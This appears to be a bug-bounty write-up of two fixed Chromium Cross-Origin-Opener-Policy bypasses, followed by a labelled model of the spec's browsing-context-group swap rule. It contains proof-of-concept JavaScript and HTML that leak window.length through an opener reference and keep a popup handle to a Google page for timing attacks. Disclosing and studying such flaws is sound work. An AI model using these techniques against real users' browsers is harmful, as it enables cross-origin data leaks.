Leaking window.length without opener reference (Awarded $2000)
It allowed leaking `window.length` from a COOP-protected page via `parent.opener.length`.
- https://example.com/ run
- On https://example.com/ run:

```javascript
open(); // cross-origin page
opener.location = 'https://first-party-test.glitch.me/?coop=same-origin'; // Page with COOP
let f = document.createElement('iframe');
f.src = "https://example.org";
document.body.appendChild(f); // Must be cross-origin
```

- In the context of the iframe, do `parent.opener.length`. To get a new length, just create a new cross-origin iframe.
This issue was fixed in https://issues.chromium.org/40059056
COOP pages got blocked when coming from a “null” origin but didn’t get severed (Awarded $3000)
The iframe had access to “w”, which could be used to do navigation-based timing attacks.
```html
<iframe
  srcdoc="<script>w = open('https://myactivity.google.com/myactivity')</script>"
  sandbox="allow-scripts allow-popups"></iframe>
```
This issue was fixed in https://issuetracker.google.com/40057526
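Both reports above are cases where a window handle survived a navigation that COOP should have severed. The model below of the HTML spec's browsing-context-group swap rule is an added example written for this page, not Chromium's or the reporters' code; the scenario inputs (COOP values, origins, the `topLevel` and `isInitialAboutBlank` flags) are assumed, and it shows only what the spec expects in each case, not the fixed bugs.

```javascript
// Model of the HTML spec's COOP browsing-context-group swap decision,
// written for this page as an illustration (not Chromium's code). A swap
// replaces the navigated top-level context, so any window handle held
// across it (opener, or a popup variable like `w`) is severed.

// Opaque ("null") origins are never same-origin with anything, so a popup
// opened from a sandboxed iframe must still be severed on reaching a COOP page.
function sameOrigin(a, b) {
  if (a === 'null' || b === 'null') return false;
  return a === b;
}

// Spec: "matching cross-origin opener policies"; a and b are {value, origin}.
function coopMatches(a, b) {
  if (a.value === 'unsafe-none' && b.value === 'unsafe-none') return true;
  if (a.value === 'unsafe-none' || b.value === 'unsafe-none') return false;
  return a.value === b.value && sameOrigin(a.origin, b.origin);
}

// True when navigating `ctx` to `response` must create a new browsing
// context group. ctx = {topLevel, isInitialAboutBlank, coop: {value, origin}};
// response = {value, origin} is the response's COOP header value and origin.
function requiresGroupSwap(ctx, response) {
  if (!ctx.topLevel) return false; // COOP only applies to top-level contexts
  if (ctx.isInitialAboutBlank &&
      ctx.coop.value === 'same-origin-allow-popups' &&
      response.value === 'unsafe-none') return false; // popup it allowed
  return !coopMatches(ctx.coop, response);
}

// Constructed scenarios mirroring the two reports above (inputs assumed).
const SCENARIOS = {
  // Report 1: a plain page navigates its opener to a COOP same-origin page;
  // the spec expects a swap, so nothing should reach the COOP page's opener.
  openerNavigatedToCoop: requiresGroupSwap(
    { topLevel: true, isInitialAboutBlank: false,
      coop: { value: 'unsafe-none', origin: 'https://example.com' } },
    { value: 'same-origin', origin: 'https://first-party-test.glitch.me' }),
  // Report 2: popup from a sandboxed (null-origin) iframe to a COOP page;
  // the spec expects a swap, which leaves `w` pointing at a closed window.
  nullOriginPopupToCoop: requiresGroupSwap(
    { topLevel: true, isInitialAboutBlank: true,
      coop: { value: 'unsafe-none', origin: 'null' } },
    { value: 'same-origin', origin: 'https://myactivity.google.com' }),
  // Contrast: same-origin-allow-popups intentionally keeps its popup handle.
  allowPopupsKeepsHandle: requiresGroupSwap(
    { topLevel: true, isInitialAboutBlank: true,
      coop: { value: 'same-origin-allow-popups', origin: 'https://a.test' } },
    { value: 'unsafe-none', origin: 'https://b.test' }),
};
```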